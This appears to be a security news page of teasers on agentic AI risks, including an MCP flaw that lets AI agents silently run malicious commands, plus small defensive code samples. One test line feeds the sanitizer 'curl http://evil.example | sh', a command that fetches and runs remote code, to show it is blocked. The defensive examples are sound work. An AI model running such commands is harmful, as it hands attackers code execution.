Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

Agentic AI at risk after MCP design flaw discovery? #ai #cybersecurity #podcast

In this week's Intel Chat, Chris Luft and Matt Bromiley discuss a design flaw in Anthropic's Model Context Protocol (MCP) that could enable large-scale supply chain attacks on agentic AI systems. Researchers at OX Security found that MCP's command execution allows malicious commands to run silently without sanitization checks or warnings.
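The fix implied by the researchers' finding, sanitizing or allow-listing commands before they run, can be sketched in a few lines. This is a hypothetical illustration in Python, not MCP's actual API; the allow-list and function names are invented for the example.

```python
import shlex

# Hypothetical allow-list of binaries an MCP-style tool server may execute.
ALLOWED_COMMANDS = {"ls", "cat", "git"}

def sanitize_command(raw: str) -> list[str]:
    """Parse a command string and refuse anything outside the allow-list,
    instead of executing it silently with no warning."""
    argv = shlex.split(raw)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not permitted: {argv[:1]}")
    return argv

# A benign command passes; an injected one fails loudly.
assert sanitize_command("git status") == ["git", "status"]
blocked = False
try:
    sanitize_command("curl http://evil.example | sh")
except PermissionError:
    blocked = True
assert blocked
```

The point of the sketch is the failure mode: an unrecognized command raises a visible error rather than running silently, which is exactly the check the reported flaw omits.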

AI Agent Sandboxing in Financial Services: Containing Blast Radius

Your progressive enforcement rollout is working. eBPF sensors are deployed across the cluster. Behavioral baselines are converging. Enforcement policies are generating from observed behavior, just like the observe-to-enforce methodology prescribes. Then your compliance officer walks over to the platform team’s desks and asks a question nobody anticipated: “Which agents are in observation mode right now?”
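The compliance officer's question has a straightforward answer only if enforcement mode is tracked as first-class fleet state rather than inferred from policy files. A minimal sketch of that idea, with names, agent IDs, and structure all invented for illustration:

```python
from dataclasses import dataclass
from enum import Enum

class Mode(Enum):
    OBSERVE = "observe"   # baseline-building; violations are logged only
    ENFORCE = "enforce"   # policy violations are actively blocked

@dataclass
class AgentPolicy:
    agent_id: str
    mode: Mode

# Hypothetical fleet state, as a platform team might record it.
fleet = [
    AgentPolicy("payments-agent", Mode.ENFORCE),
    AgentPolicy("reporting-agent", Mode.OBSERVE),
    AgentPolicy("reconciliation-agent", Mode.OBSERVE),
]

def in_observation(policies: list[AgentPolicy]) -> list[str]:
    """Answer the auditor's question: which agents are still in observe mode?"""
    return [p.agent_id for p in policies if p.mode is Mode.OBSERVE]

assert in_observation(fleet) == ["reporting-agent", "reconciliation-agent"]
```

Keeping mode as explicit, queryable state is what turns "nobody anticipated that question" into a one-line lookup.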

Shift-Left Testing Only Works If Your Tests Are Trustworthy

Shift-left has become the standard answer to the quality and security problems that accumulate when testing happens late. Move testing earlier. Catch defects in development, not in production. Run security checks in the pipeline, not in a post-release audit. The principle is sound. The execution is where most teams run into trouble.

AI Penetration Testing: Protecting LLMs From Cyber Attacks

88% of organizations now regularly use artificial intelligence (AI) in at least one business function. While adoption of AI technologies has accelerated rapidly, security measures often lag. The rush to roll out AI has, in many cases, overshadowed essential testing and safety protocols. This is a particular worry when AI and large language models (LLMs) become deeply embedded within organizational workflows and systems in a way that most software isn’t.

Introducing Decipio: A Community Tool to Catch Credential Theft in the Act with Defense First AI

Today, Arctic Wolf is announcing Decipio, a new community‑shared cybersecurity tool designed to help defenders catch attackers while they’re trying to steal credentials inside a network. Credential theft is one of the most common ways cyberattacks begin and one of the hardest to detect early. In many cases, there’s no alert, no obvious warning, and no immediate sign that anything is wrong.

What we learned using AI agents to refactor a monolith

AI agents are increasingly used to refactor large codebases, but many teams lack a clear understanding of where they succeed and where they fail. At 1Password, we applied agentic tooling to a multi-million-line Go monolith, and in this blog we'll share what worked, what broke, and what it means for teams adopting AI in production systems.

AI Workload Security on GKE: Evaluating Google Cloud Native vs Third-Party Solutions

A CISO running AI agents on GKE has watched three Google product launches in eighteen months — Model Armor, expanded Security Command Center coverage for AI workloads, additions to Chronicle’s curated detection content — and is being asked whether the GCP-native stack is now sufficient. The vendor demos and the Google Cloud blog say yes. The 2 AM analyst experience says something different.

Frontier AI Is Collapsing the Exploit Window. Here's How Defenders Must Respond.

The defensive timeline in cybersecurity is changing faster than most organizations are prepared for. For years, defenders operated with an assumption that there would be some delay between vulnerability disclosure and exploitation. That delay created a window for patching, mitigation, and detection. It wasn’t perfect, but it gave security teams time to act. Frontier AI is removing that buffer and changing how organizations must consider cyber risk.

Why Identity Security Is Key to Managing Shadow AI

Employees are adopting Artificial Intelligence (AI) tools to enhance their productivity, but they rarely consider the security implications of doing so. When an employee pastes sensitive customer data into an unapproved AI tool, that data is processed by a third-party model outside the organization’s control, often leaving no audit trail for security teams to review.
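One way identity-aware controls make shadow AI visible is to tie outbound traffic to a user identity and an approved-tool list, recreating the audit trail the teaser says is missing. A toy sketch; the domains, log format, and function name are all invented for illustration:

```python
# Hypothetical set of sanctioned AI endpoints; anything else is shadow AI.
APPROVED_AI_DOMAINS = {"approved-llm.example.com"}

# Invented identity-tagged egress records: (user, destination_domain).
egress_log = [
    ("alice", "approved-llm.example.com"),
    ("bob", "free-chatbot.example.net"),
]

def flag_shadow_ai(log):
    """Return (user, domain) pairs that reached unapproved AI endpoints,
    giving the security team both the event and the identity behind it."""
    return [(user, dom) for user, dom in log if dom not in APPROVED_AI_DOMAINS]

assert flag_shadow_ai(egress_log) == [("bob", "free-chatbot.example.net")]
```

The identity tag is the important part: without it, the team knows data left the network but not whose account sent it or which tool received it.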